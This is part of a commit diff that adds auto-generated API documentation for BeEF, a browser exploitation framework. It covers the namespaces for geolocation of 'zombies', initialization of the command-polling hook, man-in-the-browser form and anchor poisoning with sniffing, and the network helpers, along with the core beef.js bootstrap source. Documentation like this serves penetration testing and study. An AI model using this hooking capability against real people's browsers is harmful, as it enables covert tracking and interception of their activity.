<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

578
docs/beef.geolocation.html Normal file
View File

@@ -0,0 +1,578 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: geolocation</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: geolocation</h1>
<section>
<header>
<h2>geolocation</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Provides functionalities to use the geolocation API.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="geolocation.js.html">geolocation.js</a>, <a href="geolocation.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".getGeolocation"><span class="type-signature">(static) </span>getGeolocation<span class="signature">(command_url, command_id)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Retrieve latitude/longitude using the geolocation API</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>command_url</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>command_id</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="geolocation.js.html">geolocation.js</a>, <a href="geolocation.js.html#line69">line 69</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getOpenStreetMapAddress"><span class="type-signature">(static) </span>getOpenStreetMapAddress<span class="signature">(command_url, command_id, latitude, longitude)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Given latitude/longitude retrieves exact street position of the zombie</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>command_url</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>command_id</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>latitude</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>longitude</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="geolocation.js.html">geolocation.js</a>, <a href="geolocation.js.html#line29">line 29</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isGeolocationEnabled"><span class="type-signature">(static) </span>isGeolocationEnabled<span class="signature">()</span><span class="type-signature"> &rarr; {boolean}</span></h4>
<div class="description">
<p>Check if browser supports the geolocation API</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="geolocation.js.html">geolocation.js</a>, <a href="geolocation.js.html#line18">line 18</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

2086
docs/beef.hardware.html Normal file
View File

File diff suppressed because it is too large Load Diff

486
docs/beef.init.html Normal file
View File

@@ -0,0 +1,486 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: init</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: init</h1>
<section>
<header>
<h2>init</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Contains the beef_init() method which starts the BeEF client-side
logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.</p>
<p>If beef.pageIsLoaded is true, then this JS has been loaded &gt;1 times
and will have a new session id. The new session id will need to know
the brwoser details. So sendback the browser details again.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="init.js.html">init.js</a>, <a href="init.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".beef_init"><span class="type-signature">(static) </span>beef_init<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Starts the polling mechanism, and initialize various components:</p>
<ul>
<li>browser details (see browser.js) are sent back to the &quot;/init&quot; handler</li>
<li>the polling starts (checks for new commands, and execute them)</li>
<li>the logger component is initialized (see logger.js)</li>
<li>the Autorun Engine is initialized (see are.js)</li>
</ul>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="init.js.html">init.js</a>, <a href="init.js.html#line72">line 72</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".window.onclose"><span class="type-signature">(static) </span>window.onclose<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="init.js.html">init.js</a>, <a href="init.js.html#line49">line 49</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".window.onload"><span class="type-signature">(static) </span>window.onload<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="init.js.html">init.js</a>, <a href="init.js.html#line26">line 26</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".window.onpopstate"><span class="type-signature">(static) </span>window.onpopstate<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="init.js.html">init.js</a>, <a href="init.js.html#line32">line 32</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

135
docs/beef.js.html Normal file
View File

@@ -0,0 +1,135 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: beef.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: beef.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* BeEF JS Library &lt;%= @beef_version %>
* Register the BeEF JS on the window object.
*/
$j = jQuery.noConflict();
if(typeof beef === 'undefined' &amp;&amp; typeof window.beef === 'undefined') {
/**
* Register the BeEF JS on the window object.
* @namespace {Object} BeefJS
* @property {string} version BeEf Version
* @property {boolean} pageIsLoaded This gets set to true during window.onload(). It's a useful hack when messing with document.write().
* @property {array} onpopstate An array containing functions to be executed by the window.onpopstate() method.
* @property {array} onclose An array containing functions to be executed by the window.onclose() method.
* @property {array} commands An array containing functions to be executed by Beef.
* @property {array} components An array containing all the BeEF JS components.
*/
var BeefJS = {
version: '&lt;%= @beef_version %>',
pageIsLoaded: false,
onpopstate: new Array(),
onclose: new Array(),
commands: new Array(),
components: new Array(),
/**
* Adds a function to display debug messages (wraps console.log())
* @param: {string} the debug string to return
*/
debug: function(msg) {
isDebug = '&lt;%= @client_debug %>'
if (typeof console == "object" &amp;&amp; typeof console.log == "function" &amp;&amp; isDebug.localeCompare("true")) {
var currentdate = new Date();
var pad = function(n){return ("0" + n).slice(-2);}
var datetime = currentdate.getFullYear() + "-"
+ pad(currentdate.getMonth()+1) + "-"
+ pad(currentdate.getDate()) + " "
+ pad(currentdate.getHours()) + ":"
+ pad(currentdate.getMinutes()) + ":"
+ pad(currentdate.getSeconds());
console.log('['+datetime+'] '+msg);
} else {
// TODO: maybe add a callback to BeEF server for debugging purposes
//window.alert(msg);
}
},
/**
* Adds a function to execute.
* @param: {Function} the function to execute.
*/
execute: function(fn) {
if ( typeof beef.websocket == "undefined"){
this.commands.push(fn);
}else{
fn();
}
},
/**
* Registers a component in BeEF JS.
* @params: {String} the component.
*
* Components are very important to register so the framework does not
* send them back over and over again.
*/
regCmp: function(component) {
this.components.push(component);
}
};
window.beef = BeefJS;
}
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

2168
docs/beef.logger.html Normal file
View File

File diff suppressed because it is too large Load Diff

926
docs/beef.mitb.html Normal file
View File

@@ -0,0 +1,926 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: mitb</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: mitb</h1>
<section>
<header>
<h2>mitb</h2>
</header>
<article>
<div class="container-overview">
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".endSession"><span class="type-signature">(static) </span>endSession<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Signals the Framework that the user has lost the hook</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line241">line 241</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".fetch"><span class="type-signature">(static) </span>fetch<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Fetches a hooked link with AJAX</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line181">line 181</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".fetchForm"><span class="type-signature">(static) </span>fetchForm<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Fetches a hooked form with AJAX</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line161">line 161</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".fetchOnclick"><span class="type-signature">(static) </span>fetchOnclick<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Fetches a window.location=http://domainname.com and setting up history</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line202">line 202</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hook"><span class="type-signature">(static) </span>hook<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Initializes the hook on anchors and forms.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line68">line 68</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".init"><span class="type-signature">(static) </span>init<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Initializes</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line16">line 16</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".poisonAnchor"><span class="type-signature">(static) </span>poisonAnchor<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Hooks anchors and prevents them from linking away</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line99">line 99</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".poisonForm"><span class="type-signature">(static) </span>poisonForm<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Hooks forms and prevents them from linking away</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line118">line 118</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".sniff"><span class="type-signature">(static) </span>sniff<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Relays an entry to the framework</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line232">line 232</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

369
docs/beef.net.connection.html Normal file
View File

@@ -0,0 +1,369 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: connection</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: connection</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.net.html">.net</a>.</span>connection</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>beef.net.connection - wraps Mozilla's Network Information API
https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation
https://developer.mozilla.org/en-US/docs/Web/API/Navigator/connection</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_connection.js.html">net/connection.js</a>, <a href="net_connection.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".downlinkMax"><span class="type-signature">(static) </span>downlinkMax<span class="signature">()</span><span class="type-signature"> &rarr; {String}</span></h4>
<div class="description">
<p>Returns the maximum downlink speed of the connection. https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/downlinkMax</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_connection.js.html">net/connection.js</a>, <a href="net_connection.js.html#line36">line 36</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>downlink max or 'unknown'.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">String</span>
</dd>
</dl>
<h5>Example</h5>
<pre class="prettyprint"><code>beef.net.connection.downlinkMax()</code></pre>
<h4 class="name" id=".type"><span class="type-signature">(static) </span>type<span class="signature">()</span><span class="type-signature"> &rarr; {String}</span></h4>
<div class="description">
<p>Returns the connection type. https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/type</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_connection.js.html">net/connection.js</a>, <a href="net_connection.js.html#line20">line 20</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>connection type or 'unknown'.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">String</span>
</dd>
</dl>
<h5>Example</h5>
<pre class="prettyprint"><code>beef.net.connection.type()</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

452
docs/beef.net.cors.html Normal file
View File

@@ -0,0 +1,452 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: cors</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: cors</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.net.html">.net</a>.</span>cors</h2>
</header>
<article>
<div class="container-overview">
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_cors.js.html">net/cors.js</a>, <a href="net_cors.js.html#line1">line 1</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".request"><span class="type-signature">(static) </span>request<span class="signature">(method, url, data, timeout, callback)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Make a cross-origin request using CORS</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>method</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>HTTP verb ('GET', 'POST', 'DELETE', etc.)</p></td>
</tr>
<tr>
<td class="name"><code>url</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>url</p></td>
</tr>
<tr>
<td class="name"><code>data</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>request body</p></td>
</tr>
<tr>
<td class="name"><code>timeout</code></td>
<td class="type">
<span class="param-type">Integer</span>
</td>
<td class="description last"><p>request timeout in milliseconds</p></td>
</tr>
<tr>
<td class="name"><code>callback</code></td>
<td class="type">
<span class="param-type">function</span>
</td>
<td class="description last"><p>function to callback on completion</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_cors.js.html">net/cors.js</a>, <a href="net_cors.js.html#line27">line 27</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".response"><span class="type-signature">(static) </span>response<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Response Object - used in the beef.net.request callback</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_cors.js.html">net/cors.js</a>, <a href="net_cors.js.html#line12">line 12</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a 